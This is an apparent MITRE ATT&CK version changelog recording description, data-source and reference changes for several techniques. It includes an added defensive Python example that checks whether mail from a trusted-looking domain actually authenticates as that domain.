  external_references: {'source_name': 'University of Birmingham C2', 'description': 'Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', 'url': 'https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf'}
  external_references: {'source_name': 'Brazking-Websockets', 'description': 'Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.', 'url': 'https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/'}

[T1584.006] Compromise Infrastructure: Web Services

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.

New Description:
Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.
Details
dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_contributors: ['Dor Edry, Microsoft']
  x_mitre_deprecated: False
values_changed
  modified: 2021-10-17 16:01:48.047000+00:00 → 2023-04-12 20:19:21.620000+00:00
  description (old): Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.
  description (new): Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.
  x_mitre_version: 1.1 → 1.2

[T1583.006] Acquire Infrastructure: Web Services

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

New Description:
Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
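Both web-services entries above (compromised accounts in T1584.006 and adversary-registered ones here) now list Phishing, and the compromised-services entry adds that a web-based email service lets the adversary borrow the trust of a legitimate domain. The receiving side can at least measure how much of that trust is earned: the Authentication-Results header (RFC 8601) that the inbound MTA adds records which domain passed SPF and which domain signed with DKIM, and DMARC-style alignment asks whether either of those is the domain shown in From. The script below is an added example that serves both entries and is not ATT&CK's code. It approximates the organizational domain as the last two labels (an assumption that ignores the public suffix list), and the messages, domains and the third-party sending service in them are constructed; a real service would sign with its own domain.

```python
"""Does mail claiming a trusted From domain actually authenticate as it?

Added example for the two web-services entries (T1584.006 and T1583.006);
it is not ATT&CK's code. It reads the Authentication-Results header
(RFC 8601) added by the receiving MTA and reports messages whose visible
From domain is not aligned with the SPF or DKIM domain, i.e. the message
rode a third-party sending service rather than the domain's own mail path.
The organizational domain is approximated as the last two DNS labels (an
assumption that ignores the public suffix list); all messages and domains
below are constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr

RESULT_RE = re.compile(r"\b(spf|dkim)=([a-z]+)", re.I)
DOMAIN_RE = re.compile(r"(?:header\.d|smtp\.mailfrom)=(\S+)", re.I)


def org_domain(domain):
    """Approximate organizational domain: the last two DNS labels."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_auth_results(header):
    """Map method -> (result, domain) from one Authentication-Results value."""
    out = {}
    for clause in header.split(";")[1:]:  # [0] is the authserv-id
        m = RESULT_RE.search(clause)
        if not m:
            continue
        d = DOMAIN_RE.search(clause)
        domain = d.group(1).lower() if d else ""
        if "@" in domain:  # smtp.mailfrom may carry a full address
            domain = domain.rsplit("@", 1)[1]
        out[m.group(1).lower()] = (m.group(2).lower(), domain)
    return out


def assess(raw_message, trusted_domains):
    """Verdict for one message: which methods align with From, and a flag."""
    msg = message_from_string(raw_message)
    _, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rsplit("@", 1)[1].lower() if "@" in addr else ""
    results = parse_auth_results(msg.get("Authentication-Results", ""))
    aligned = [method for method in ("spf", "dkim")
               if results.get(method, ("none", ""))[0] == "pass"
               and results[method][1]
               and org_domain(results[method][1]) == org_domain(from_domain)]
    trusted = org_domain(from_domain) in trusted_domains
    return {
        "from_domain": from_domain,
        "trusted_from": trusted,
        "dkim_domain": results.get("dkim", ("none", ""))[1],
        "aligned": aligned,
        # A trusted-looking sender with nothing aligned: the From domain's
        # reputation is unearned, whether by a spoofer or by a third-party
        # service account the domain never authorized.
        "flag": trusted and not aligned,
    }


TRUSTED = {"partner.example"}

# Constructed messages: the partner's own mail path, the same From sent
# through a third-party sending service, and an unrelated domain.
MSG_ALIGNED = """\
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=partner.example; dkim=pass header.d=partner.example header.s=sel1
From: Alice <alice@partner.example>
To: bob@corp.example
Subject: Q2 invoice

Please find the invoice attached.
"""

MSG_VIA_SERVICE = """\
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=bounces.mailservice.example; dkim=pass header.d=mailservice.example header.s=s1
From: Alice <alice@partner.example>
To: bob@corp.example
Subject: Action required: confirm your password

Click the link below within 24 hours.
"""

MSG_UNTRUSTED = """\
Authentication-Results: mx.corp.example; spf=none; dkim=none
From: News <news@newsletter.example>
To: bob@corp.example
Subject: Weekly digest

Hello.
"""

if __name__ == "__main__":
    for raw in (MSG_ALIGNED, MSG_VIA_SERVICE, MSG_UNTRUSTED):
        print(assess(raw, TRUSTED))
```

The caveat the description implies: if the partner's domain has authorized the service (SPF include, DKIM key published), a message sent from a compromised account on that service aligns perfectly and this check passes. Alignment tells you the service was sanctioned, not that the account behind it is still in the right hands; for that you fall back on content, sending-pattern and account-activity signals.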
Details
dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_contributors: ['Dor Edry, Microsoft']
  x_mitre_deprecated: False
values_changed
  modified: 2021-10-17 15:45:01.956000+00:00 → 2023-04-12 20:19:07.916000+00:00
  description (old): Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
  description (new): Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
  x_mitre_version: 1.1 → 1.2

[T1222.001] File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False
dictionary_item_removed
  x_mitre_permissions_required: ['User', 'Administrator', 'SYSTEM']
values_changed
  modified: 2020-09-01 20:05:05.268000+00:00 → 2023-04-21 12:27:04.900000+00:00
  external_references[3]['source_name']: Microsoft DACL May 2018 → Microsoft Access Control Lists May 2018
  external_references[3]['description']: Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018. → M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.
  external_references[3]['url']: https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces → https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists
  external_references[4]['source_name']: Microsoft Access Control Lists May 2018 → Microsoft DACL May 2018
  external_references[4]['description']: M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020. → Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.
  external_references[4]['url']: https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists → https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces
  x_mitre_data_sources[2]: Process: Process Creation → Command: Command Execution
  x_mitre_data_sources[3]: Command: Command Execution → Process: Process Creation
  x_mitre_version: 1.1 → 1.2

[T1047] Windows Management Instrumentation

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 16:25:21.348000+00:00 | 2023-04-07 17:10:13.696000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution
x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation
x_mitre_version | 1.2 | 1.3

[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 17:01:37.760000+00:00 | 2023-04-21 12:32:38.796000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | New Value
x_mitre_data_sources | Process: Process Creation
iterable_item_removed
STIX Field | Old value
x_mitre_data_sources | Process: Process Creation

[T1543.003] Create or Modify System Process: Windows Service

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-06-30 20:17:33.824000+00:00 | 2023-04-21 12:30:35.872000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Windows Registry: Windows Registry Key Creation
x_mitre_data_sources[1] | Driver: Driver Load | Process: Process Creation
x_mitre_data_sources[2] | Service: Service Modification | Service: Service Creation
x_mitre_data_sources[3] | Windows Registry: Windows Registry Key Creation | Command: Command Execution
x_mitre_data_sources[5] | Command: Command Execution | Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[6] | Process: Process Creation | Service: Service Modification
x_mitre_data_sources[7] | Service: Service Creation | Driver: Driver Load
x_mitre_version | 1.2 | 1.3
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/478.html', 'external_id': 'CAPEC-478'}
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/550.html', 'external_id': 'CAPEC-550'}
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/551.html', 'external_id': 'CAPEC-551'}

Patches

[T1134] Access Token Manipulation

Current version: 2.0

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-03 02:14:43.557000+00:00 | 2023-03-30 21:01:47.762000+00:00
x_mitre_data_sources[3] | Process: Process Creation | Active Directory: Active Directory Object Modification
x_mitre_data_sources[5] | Active Directory: Active Directory Object Modification | Process: Process Creation
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/633.html', 'external_id': 'CAPEC-633'}

[T1547.014] Boot or Logon Autostart Execution: Active Setup

Current version: 1.0

Details
dictionary_item_added
STIX Field | New Value
x_mitre_attack_spec_version | 3.1.0
x_mitre_deprecated | False
values_changed
STIX Field | Old value | New Value
modified | 2021-03-05 22:36:37.414000+00:00 | 2023-03-22 14:17:17.353000+00:00
external_references[1]['source_name'] | Klein Active Setup 2010 | SECURELIST Bright Star 2015
external_references[1]['description'] | Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020. | Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020.
external_references[1]['url'] | https://helgeklein.com/blog/2010/04/active-setup-explained/ | https://securelist.com/whos-really-spreading-through-the-bright-star/68978/
external_references[2]['description'] | Glyer, C. (2010). Examples of Recent APT Persitence Mechanism. Retrieved December 18, 2020. | Glyer, C. (2010). Examples of Recent APT Persistence Mechanism. Retrieved December 18, 2020.
external_references[3]['source_name'] | Citizenlab Packrat 2015 | FireEye CFR Watering Hole 2012
external_references[3]['description'] | Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020. | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.
external_references[3]['url'] | https://citizenlab.ca/2015/12/packrat-report/ | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
external_references[4]['source_name'] | FireEye CFR Watering Hole 2012 | Klein Active Setup 2010
external_references[4]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.
external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://helgeklein.com/blog/2010/04/active-setup-explained/
external_references[5]['source_name'] | SECURELIST Bright Star 2015 | paloalto Tropic Trooper 2016
external_references[5]['description'] | Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020. | Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.
external_references[5]['url'] | https://securelist.com/whos-really-spreading-through-the-bright-star/68978/ | https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/
external_references[6]['source_name'] | paloalto Tropic Trooper 2016 | TechNet Autoruns
external_references[6]['description'] | Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
external_references[6]['url'] | https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ | https://technet.microsoft.com/en-us/sysinternals/bb963902
external_references[7]['source_name'] | TechNet Autoruns | Citizenlab Packrat 2015
external_references[7]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.
external_references[7]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://citizenlab.ca/2015/12/packrat-report/
x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Process: Process Creation
x_mitre_data_sources[1] | Process: Process Creation | Windows Registry: Windows Registry Key Creation
x_mitre_data_sources[3] | Windows Registry: Windows Registry Key Creation | Windows Registry: Windows Registry Key Modification

[T1557] Adversary-in-the-Middle

Current version: 2.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-19 19:51:41.858000+00:00 | 2023-03-30 21:01:37.568000+00:00
iterable_item_added
STIX Field | New Value
x_mitre_data_sources | Application Log: Application Log Content
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/94.html', 'external_id': 'CAPEC-94'}
x_mitre_data_sources | Application Log: Application Log Content

[T1123] Audio Capture

Current version: 1.0

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | New Value
x_mitre_attack_spec_version | 3.1.0
values_changed
STIX Field | Old value | New Value
modified | 2020-07-14 19:42:10.235000+00:00 | 2023-03-30 21:01:36.503000+00:00
x_mitre_data_sources[0] | Process: OS API Execution | Command: Command Execution
x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/634.html', 'external_id': 'CAPEC-634'}

[T1027.001] Obfuscated Files or Information: Binary Padding

Current version: 1.2

Details
dictionary_item_added
STIX Field | New Value
x_mitre_attack_spec_version | 3.1.0
external_references | Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.
external_references | Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.
dictionary_item_removed
STIX Field | Old value
external_references | CAPEC-572
external_references | CAPEC-655
values_changed
STIX Field | Old value | New Value
modified | 2021-10-15 13:53:02.135000+00:00 | 2023-03-30 21:01:53.857000+00:00
external_references[1]['source_name'] | capec | ESET OceanLotus
external_references[1]['url'] | https://capec.mitre.org/data/definitions/572.html | https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
external_references[2]['source_name'] | capec | Securelist Malware Tricks April 2017
external_references[2]['url'] | https://capec.mitre.org/data/definitions/655.html | https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/
external_references[3]['source_name'] | ESET OceanLotus | VirusTotal FAQ
external_references[3]['description'] | Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018. | VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.
external_references[3]['url'] | https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/ | https://www.virustotal.com/en/faq/
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'Securelist Malware Tricks April 2017', 'description': 'Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.', 'url': 'https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/'}
external_references | {'source_name': 'VirusTotal FAQ', 'description': 'VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.', 'url': 'https://www.virustotal.com/en/faq/'}

[T1547] Boot or Logon Autostart Execution

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-18 22:21:27.840000+00:00 | 2023-03-30 21:01:42.099000+00:00
x_mitre_data_sources[0] | Process: Process Creation | Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[1] | Driver: Driver Load | File: File Creation
x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Creation | Process: OS API Execution
x_mitre_data_sources[4] | Module: Module Load | File: File Modification
x_mitre_data_sources[5] | Windows Registry: Windows Registry Key Modification | Process: Process Creation
x_mitre_data_sources[6] | Command: Command Execution | Driver: Driver Load
x_mitre_data_sources[7] | File: File Creation | Command: Command Execution
x_mitre_data_sources[8] | File: File Modification | Windows Registry: Windows Registry Key Creation
x_mitre_data_sources[9] | Process: OS API Execution | Module: Module Load
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/564.html', 'external_id': 'CAPEC-564'}

[T1037] Boot or Logon Initialization Scripts

Current version: 2.1

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | New Value
x_mitre_attack_spec_version | 3.1.0
values_changed
STIX Field | Old value | New Value
modified | 2022-04-01 19:04:02.610000+00:00 | 2023-03-30 21:01:38.295000+00:00
x_mitre_data_sources[0] | Active Directory: Active Directory Object Modification | Process: Process Creation
x_mitre_data_sources[1] | Process: Process Creation | File: File Modification
x_mitre_data_sources[2] | File: File Creation | Windows Registry: Windows Registry Key Creation
x_mitre_data_sources[3] | Command: Command Execution | Active Directory: Active Directory Object Modification
x_mitre_data_sources[4] | File: File Modification | File: File Creation
x_mitre_data_sources[5] | Windows Registry: Windows Registry Key Creation | Command: Command Execution
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/564.html', 'external_id': 'CAPEC-564'}

[T1542.003] Pre-OS Boot: Bootkit

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | New Value
x_mitre_attack_spec_version | 3.1.0
external_references | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.
dictionary_item_removed
STIX Field | Old value
external_references | CAPEC-552
values_changed
STIX Field | Old value | New Value
modified | 2020-09-17 19:47:14.338000+00:00 | 2023-03-30 21:01:47.417000+00:00
external_references[1]['source_name'] | capec | Mandiant M Trends 2016
external_references[1]['url'] | https://capec.mitre.org/data/definitions/552.html | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
external_references[2]['source_name'] | Mandiant M Trends 2016 | Lau 2011
external_references[2]['description'] | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019. | Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.
external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf | http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'Lau 2011', 'description': 'Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.', 'url': 'http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion'}

[T1546.001] Event Triggered Execution: Change Default File Association

Current version: 1.0

Dropped Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 16:55:49.219000+00:00 | 2023-03-30 21:01:40.699000+00:00
x_mitre_data_sources[1] | Process: Process Creation | Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Modification | Process: Process Creation
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/556.html', 'external_id': 'CAPEC-556'}

[T1552.001] Unsecured Credentials: Credentials In Files

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | New Value
x_mitre_attack_spec_version | 3.1.0
external_references | CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.
dictionary_item_removed
STIX Field | Old value
external_references | CAPEC-639
values_changed
STIX Field | Old value | New Value
modified | 2021-04-12 18:32:32.803000+00:00 | 2023-03-30 21:01:44.951000+00:00
external_references[1]['source_name'] | capec | CG 2014
external_references[1]['url'] | https://capec.mitre.org/data/definitions/639.html | http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html
external_references[2]['source_name'] | CG 2014 | SRD GPP
external_references[2]['description'] | CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014. | Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.
external_references[2]['url'] | http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html | http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx
external_references[3]['source_name'] | SRD GPP | Unit 42 Hildegard Malware
external_references[3]['description'] | Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015. | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
external_references[3]['url'] | http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
external_references[4]['source_name'] | Unit 42 Hildegard Malware | Unit 42 Unsecured Docker Daemons
external_references[4]['description'] | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. | Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.
external_references[4]['url'] | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ | https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/
external_references[5]['source_name'] | Unit 42 Unsecured Docker Daemons | Specter Ops - Cloud Credential Storage
external_references[5]['description'] | Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021. | Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.
external_references[5]['url'] | https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/ | https://posts.specterops.io/head-in-the-clouds-bd038bb69e48
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'Specter Ops - Cloud Credential Storage', 'description': 'Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.', 'url': 'https://posts.specterops.io/head-in-the-clouds-bd038bb69e48'}

[T1574.001] Hijack Execution Flow: DLL Search Order Hijacking

Current version: 1.1

Details
dictionary_item_added
STIX Field | New Value
x_mitre_attack_spec_version | 3.1.0
external_references | Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.
dictionary_item_removed
STIX Field | Old value
external_references | CAPEC-471
values_changed
STIX Field | Old value | New Value
modified | 2021-04-26 18:37:03.748000+00:00 | 2023-03-30 21:01:51.098000+00:00
external_references[1]['source_name'] | capec | Microsoft Dynamic Link Library Search Order
external_references[1]['url'] | https://capec.mitre.org/data/definitions/471.html | https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN
external_references[2]['source_name'] | Microsoft Dynamic Link Library Search Order | FireEye Hijacking July 2010
external_references[2]['description'] | Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014. | Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.
external_references[2]['url'] | https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN | https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html
external_references[3]['source_name'] | FireEye Hijacking July 2010 | OWASP Binary Planting
external_references[3]['description'] | Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020. | OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html | https://www.owasp.org/index.php/Binary_planting
external_references[4]['source_name'] | OWASP Binary Planting | FireEye fxsst June 2011
external_references[4]['description'] | OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016. | Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.
external_references[4]['url'] | https://www.owasp.org/index.php/Binary_planting | https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
external_references[5]['source_name'] | FireEye fxsst June 2011 | Microsoft Security Advisory 2269637
external_references[5]['description'] | Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020. | Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.
external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html | https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637
external_references[6]['source_name'] | Microsoft Security Advisory 2269637 | Microsoft Dynamic-Link Library Redirection
external_references[6]['description'] | Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020. | Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.
